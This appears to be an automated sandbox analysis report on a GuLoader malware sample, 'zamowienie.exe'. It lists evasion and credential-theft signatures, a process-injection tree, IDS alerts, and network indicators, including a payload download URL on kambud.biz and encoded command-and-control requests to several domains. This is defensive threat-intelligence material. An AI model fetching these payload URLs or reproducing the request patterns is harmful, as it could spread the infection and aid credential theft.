Windows Analysis Report
zamowienie.exe

Overview

General Information

Sample name: zamowienie.exe
Analysis ID: 1539242
MD5: 48f82f781035def809b0cdb2f66097a9
SHA1: 4a4ddf2315449dfcad4682fe6860e617b94e60b1
SHA256: 50f7a5ef12735cba58b3990988df8384294b42863033acc3d1bd939c3d00bdc5
Tags: exe, user-MarekSmar14
Infos:

Detection

GuLoader
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • zamowienie.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\zamowienie.exe" MD5: 48F82F781035DEF809B0CDB2F66097A9)
    • zamowienie.exe (PID: 1216 cmdline: "C:\Users\user\Desktop\zamowienie.exe" MD5: 48F82F781035DEF809B0CDB2F66097A9)
      • dmQRVBQMPL.exe (PID: 616 cmdline: "C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • verclsid.exe (PID: 1200 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)
          • dmQRVBQMPL.exe (PID: 764 cmdline: "C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6164 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.2435885467.0000000005488000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-22T13:26:47.176136+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49876 | 185.17.43.223 | 443 | TCP

    AV Detection

    Source: zamowienie.exe | Avira: detected
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: zamowienie.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 185.17.43.223:443 -> 192.168.2.5:49876 version: TLS 1.2
    Source: zamowienie.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: dmQRVBQMPL.exe, 00000006.00000002.3906673030.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3906681333.0000000000D7E000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: wntdll.pdbUGP source: zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: zamowienie.exe, zamowienie.exe, 00000003.00000003.2844137125.0000000034D15000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842153780.0000000034B62000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000007.00000003.2949515842.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000003.2947332940.0000000004B26000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: verclsid.pdbGCTL source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmp
    Source: Binary string: verclsid.pdb source: zamowienie.exe, 00000003.00000003.2902140294.0000000004DF6000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2902118172.0000000004E31000.00000004.00000020.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906341208.0000000000B88000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\zamowienie.exe | Code function: 0_2_00406751 FindFirstFileA,FindClose, 0_2_00406751
    Source: C:\Users\user\Desktop\zamowienie.exe | Code function: 0_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose, 0_2_00405B80
    Source: C:\Users\user\Desktop\zamowienie.exe | Code function: 0_2_004027CF FindFirstFileA, 0_2_004027CF
    Source: C:\Windows\SysWOW64\verclsid.exe | Code function: 7_2_02EBC460 FindFirstFileW,FindNextFileW,FindClose, 7_2_02EBC460
    Source: C:\Users\user\Desktop\zamowienie.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
    Source: C:\Users\user\Desktop\zamowienie.exe | File opened: C:\Users\user
    Source: C:\Users\user\Desktop\zamowienie.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
    Source: C:\Users\user\Desktop\zamowienie.exe | File opened: C:\Users\user\AppData
    Source: C:\Users\user\Desktop\zamowienie.exe | File opened: C:\Users\user\AppData\Local\Microsoft
    Source: C:\Users\user\Desktop\zamowienie.exe | File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\SysWOW64\verclsid.exe | Code function: 4x nop then xor eax, eax 7_2_02EA9DF0
    Source: C:\Windows\SysWOW64\verclsid.exe | Code function: 4x nop then mov ebx, 00000004h 7_2_04DA04E8
    Source: Joe Sandbox View | IP Address: 13.248.169.48
    Source: Joe Sandbox View | IP Address: 195.110.124.133
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49876 -> 185.17.43.223:443
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET /uCEVRNHZgMA26.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: kambud.biz | Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /sa87/?vd=fhUlwfGxBn-tt&-v4puN=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8NGP70JKOBpAfy7n0mtS8Kr3O7U4faJdfEPNjknslXQEWEA== HTTP/1.1Host: www.svarus.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /y868/?-v4puN=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOp0uvryv675HptA9HxwsyIlIOO11NrggPw5LqW5SmsafU0A==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.newhopetoday.appAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /tcwz/?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg== HTTP/1.1Host: www.ladylawher.orgAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /8gyb/?-v4puN=oHLOMFnpuCQwEmmcfjaPzEs/vXwrZtaPQF7csdtv5Eh2A0RcvZoTiB5djAiNITJM5AjEN183LiB5K62qTN14+moW7AK7WqEInxUu+7Nqydpi+78xinwtbpXqTzluMhpRfQ==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.nutrigenfit.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /rod1/?vd=fhUlwfGxBn-tt&-v4puN=625sgw1Vn/LiYNFkuNXWgUQa6VpWz6NoZgO4nBFbZUGQF7cSiahkAd5Np5VrTvFPZWnEzDVMZ2bBqmHKU8WTD6xVXOOHKx/2RY/6WwAhCi5V31VMR0XJVnQWnK4Gp4bSPg== HTTP/1.1Host: www.gold-rates.onlineAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /t4fd/?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.3808.appAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global trafficHTTP traffic detected: GET /bx4s/?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-tt HTTP/1.1Host: www.yourwebbuzz.netAccept: */*Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global traffic | DNS traffic detected: DNS query: kambud.biz
    Source: global traffic | DNS traffic detected: DNS query: www.svarus.online
    Source: global traffic | DNS traffic detected: DNS query: www.newhopetoday.app
    Source: global traffic | DNS traffic detected: DNS query: www.ladylawher.org
    Source: global traffic | DNS traffic detected: DNS query: www.nutrigenfit.online
    Source: global traffic | DNS traffic detected: DNS query: www.gold-rates.online
    Source: global traffic | DNS traffic detected: DNS query: www.3808.app
    Source: global traffic | DNS traffic detected: DNS query: www.yourwebbuzz.net
    Source: unknown | HTTP traffic detected: POST /y868/ HTTP/1.1 | Host: www.newhopetoday.app | Accept: */* | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Connection: close | Content-Length: 207 | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Origin: http://www.newhopetoday.app | Referer: http://www.newhopetoday.app/y868/ | User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 22 Oct 2024 11:27:39 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=UTF-8 | x-request-id: 4a31b0fc-240d-4165-8e51-d421e7e48755 | x-runtime: 0.035018 | content-length: 17022 | connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=UTF-8 | x-request-id: 5d18c69d-b52f-4fc3-b1ae-01bb60fb5ea6 | x-runtime: 0.034907 | content-length: 17042 | connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html; charset=UTF-8 | x-request-id: 76479084-936f-46e8-a604-cf2f4b663d72 | x-runtime: 0.033822 | content-length: 18058 | connection: close
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 22 Oct 2024 11:28:23 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 22 Oct 2024 11:28:25 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 22 Oct 2024 11:28:28 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 22 Oct 2024 11:28:31 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /8gyb/ was not found on this server.</p></body></html>
    Source: zamowienie.exeString found in binary or memory: http://crl.apple.com/root.crl0
    Source: zamowienie.exeString found in binary or memory: http://crl.apple.com/timestamp.crl0
    Source: zamowienie.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: zamowienie.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: dmQRVBQMPL.exe, 00000008.00000002.3908164269.0000000004E55000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3808.app
    Source: dmQRVBQMPL.exe, 00000008.00000002.3908164269.0000000004E55000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3808.app/t4fd/
    Source: zamowienie.exeString found in binary or memory: http://www.apple.com/appleca0
    Source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: zamowienie.exe, 00000003.00000001.2433379972.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: zamowienie.exe, 00000003.00000001.2433379972.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
    Source: zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/:
    Source: zamowienie.exe, 00000003.00000002.2942527960.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942603184.0000000004DD9000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842830620.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000002.2968852172.00000000342E0000.00000004.00001000.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.bin
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.bin(
    Source: zamowienie.exe, 00000003.00000002.2942603184.0000000004DD9000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.bin6
    Source: zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kambud.biz/uCEVRNHZgMA26.binv
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033G
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: verclsid.exe, 00000007.00000002.3906236377.00000000031E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
    Source: verclsid.exe, 00000007.00000003.3126244657.0000000007ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
    Source: zamowienie.exeString found in binary or memory: https://www.apple.com/appleca/0
    Source: verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005EDC000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.00000000033EC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=parked
